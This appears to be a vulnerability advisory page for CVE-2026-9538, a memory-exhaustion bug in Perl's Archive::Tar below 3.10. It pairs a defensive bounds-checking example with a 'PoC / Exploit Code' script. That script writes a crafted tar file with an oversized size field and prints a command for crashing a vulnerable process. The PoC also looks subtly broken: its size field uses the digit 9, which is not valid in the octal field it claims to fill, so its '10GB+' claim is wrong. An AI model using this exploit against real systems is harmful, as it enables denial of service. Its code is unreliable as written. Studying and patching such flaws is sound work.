Security Vulnerability Report
CVE-2026-9538 CVSS 7.5 HIGH

CVE-2026-9538

Published: 2026-05-26 02:16:41
Last Modified: 2026-05-27 17:24:30
Source: 9b29abf9-4ab0-4765-b253-1875cd9b441e

Description

Archive::Tar versions before 3.10 for Perl allow memory exhaustion via an attacker-controlled entry size field in the tar header. _read_tar() reads each entry's payload with $handle->read($$data, $block), where $block is derived from the entry's 12-byte size field in the tar header with no upper bound on that value. A crafted header declaring a multi-gigabyte size therefore causes Perl to allocate a scalar of that size.
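
To show the kind of bound the description says is missing, the following Perl is an added example written for this report; it is not Archive::Tar's code and not the 3.10 fix. It treats the 12-byte size field as untrusted input, checks it against the bytes that physically remain in the archive and against a policy cap (MAX_ENTRY_SIZE, an assumed value) before anything is allocated, and then reads accepted payloads in fixed-size chunks. The two sample headers are constructed in memory; checksum validation and GNU base-256 size encoding are deliberately left out.

```perl
#!/usr/bin/perl
# Added defensive example (not Archive::Tar's own code): bound the declared
# entry size before any allocation and never read in one declared-size block.
use strict;
use warnings;

use constant HEADER_SIZE    => 512;
use constant MAX_ENTRY_SIZE => 64 * 1024 * 1024;  # assumed policy cap; tune per deployment
use constant CHUNK          => 1024 * 1024;       # fixed read granularity, never the declared size

# Parse the octal size field at offset 124 (12 bytes). Returns undef for
# anything that is not a clean octal number: oct() would otherwise stop at
# the first non-octal digit without signalling an error. A byte with the high
# bit set (GNU base-256 encoding) is also treated as malformed here.
sub declared_size {
    my ($header) = @_;
    my $field = substr($header, 124, 12);
    $field =~ s/[\x00 ]+$//;               # strip NUL/space terminators
    return undef unless $field =~ /^[0-7]+$/;
    return oct($field);
}

# Decide whether an entry may be read. $remaining is the number of bytes that
# physically follow the header in the archive; a header cannot honestly claim
# more payload than that, and even an honest size must respect the cap.
sub check_entry {
    my ($header, $remaining) = @_;
    my $size = declared_size($header);
    return (0, "malformed size field") unless defined $size;
    return (0, "declared $size bytes but only $remaining remain") if $size > $remaining;
    return (0, "declared $size bytes exceeds cap " . MAX_ENTRY_SIZE) if $size > MAX_ENTRY_SIZE;
    return (1, $size);
}

# Read $size bytes in CHUNK-sized pieces and hand each piece to $sink, so no
# single read() asks Perl to reserve the whole declared length up front.
sub read_payload {
    my ($fh, $size, $sink) = @_;
    my $left = $size;
    while ($left > 0) {
        my $want = $left < CHUNK ? $left : CHUNK;
        my $got = read($fh, my $buf, $want);
        return 0 unless defined $got && $got == $want;   # truncated archive
        $sink->($buf);
        $left -= $want;
    }
    return 1;
}

# Constructed sample header (checksum omitted; a real reader verifies it
# before trusting any other field).
sub make_header {
    my ($size) = @_;
    my $h = "\x00" x HEADER_SIZE;
    substr($h, 0, 6)    = "sample";                       # name
    substr($h, 124, 12) = sprintf("%011o\x00", $size);    # size, NUL-terminated octal
    substr($h, 156, 1)  = "0";                            # typeflag: regular file
    return $h;
}

# 1. A header claiming 4 GiB inside a 1 KiB archive: rejected before any read.
my $big = make_header(4 * 1024 * 1024 * 1024);
my ($ok, $why) = check_entry($big, 1024 - HEADER_SIZE);
print $ok ? "accepted\n" : "rejected: $why\n";

# 2. An honest 5-byte entry, read in bounded chunks from an in-memory archive.
my $archive = make_header(5) . "hello" . ("\x00" x 507);
open(my $fh, '<', \$archive) or die "open: $!";
read($fh, my $hdr, HEADER_SIZE) == HEADER_SIZE or die "short header";
my ($ok2, $size) = check_entry($hdr, length($archive) - HEADER_SIZE);
die "rejected: $size" unless $ok2;
my $body = '';
read_payload($fh, $size, sub { $body .= shift }) or die "truncated archive";
print "read $size bytes: $body\n";
close($fh);
```

Run it with perl: the 4 GiB header is refused with no read at all, and the 5-byte entry is read through the chunked path. The two bounds are independent on purpose: the remaining-bytes check defeats a header that lies about its payload, while the cap protects a reader that keeps whole payloads in memory from an archive that really is that large.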

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Weakness
CWE-789 (Memory Allocation with Excessive Size Value)

Configurations (Affected Products)

cpe:2.3:a:archive\:\:tar_project:archive\:\:tar:*:*:*:*:*:perl:*:* - VULNERABLE
Archive::Tar < 3.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
perl
#!/usr/bin/perl
use strict;
use warnings;

# PoC for CVE-2026-9538: Memory Exhaustion in Archive::Tar
# This script generates a crafted tar file with a massive size field.

my $filename = "exploit_CVE-2026-9538.tar";
open(my $fh, '>', $filename) or die "Cannot open file: $!";

# Construct a malicious TAR Header (512 bytes)
my $header = "A" x 100;          # Name
$header .= "0000644\x00";        # Mode
$header .= "0000000\x00";        # Uid
$header .= "0000000\x00";        # Gid
# Vulnerability: Size field set to a huge number (e.g., 10GB+)
# This value is taken directly from the header without bounds checking.
$header .= "99999999999\x00";    # Size (12 bytes)
$header .= "00000000000\x00";    # Mtime
$header .= " " x 8;              # Checksum placeholder (8 spaces)
$header .= "0";                  # Typeflag (regular file)
$header .= "\x00" x 100;         # Linkname
$header .= "ustar\x00";          # Magic
$header .= "00";                 # Version
$header .= "\x00" x 32;          # Uname
$header .= "\x00" x 32;          # Gname
$header .= "\x00" x 8;           # Devmajor
$header .= "\x00" x 8;           # Devminor
$header .= "\x00" x 155;         # Prefix

# Pad header to 512 bytes
$header .= "\x00" x (512 - length($header));

# Calculate checksum (sum of bytes, with the checksum field counted as spaces)
my $sum = 0;
for (my $i = 0; $i < 512; $i++) {
    $sum += ord(substr($header, $i, 1));
}

# Insert checksum into header
my $checksum_str = sprintf("%06o\x00 ", $sum);
substr($header, 148, 8) = $checksum_str;

print $fh $header;
close($fh);

print "[+] Created malicious tar file: $filename\n";
print "[+] To trigger the vulnerability, run the following command on a vulnerable system:\n";
print "    perl -MArchive::Tar -e 'Archive::Tar->new()->read(\"$filename\")'\n";
print "[+] Expected result: Process hangs or crashes due to Out Of Memory (OOM).\n";

References

https://github.com/jib/archive-tar-new/commit/f9af01426038e29d9578825a0cd3626946ab08c7.patch (Patch)
https://metacpan.org/release/BINGOS/Archive-Tar-3.10/changes (Release Notes)
http://www.openwall.com/lists/oss-security/2026/05/26/4 (Mailing List, Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-9538", "sourceIdentifier": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "published": "2026-05-26T02:16:41.150", "lastModified": "2026-05-27T17:24:29.933", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Archive::Tar versions before 3.10 for Perl allow memory exhaustion via attacker controlled entry size field in tar header.\n\n_read_tar() reads each entry's payload with $handle->read($$data, $block), where $block is derived from the entry's 12-byte size field in the tar header with no upper bound on that value.\n\nA crafted header declaring a multi-gigabyte size causes Perl to allocate a scalar of that size."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-789"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:archive\\:\\:tar_project:archive\\:\\:tar:*:*:*:*:*:perl:*:*", "versionEndExcluding": "3.10", "matchCriteriaId": "0D0D2922-4664-4650-8D9E-C8D5641A7106"}]}]}], "references": [{"url": "https://github.com/jib/archive-tar-new/commit/f9af01426038e29d9578825a0cd3626946ab08c7.patch", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "tags": ["Patch"]}, {"url": "https://metacpan.org/release/BINGOS/Archive-Tar-3.10/changes", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "tags": ["Release Notes"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/26/4", 
"source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}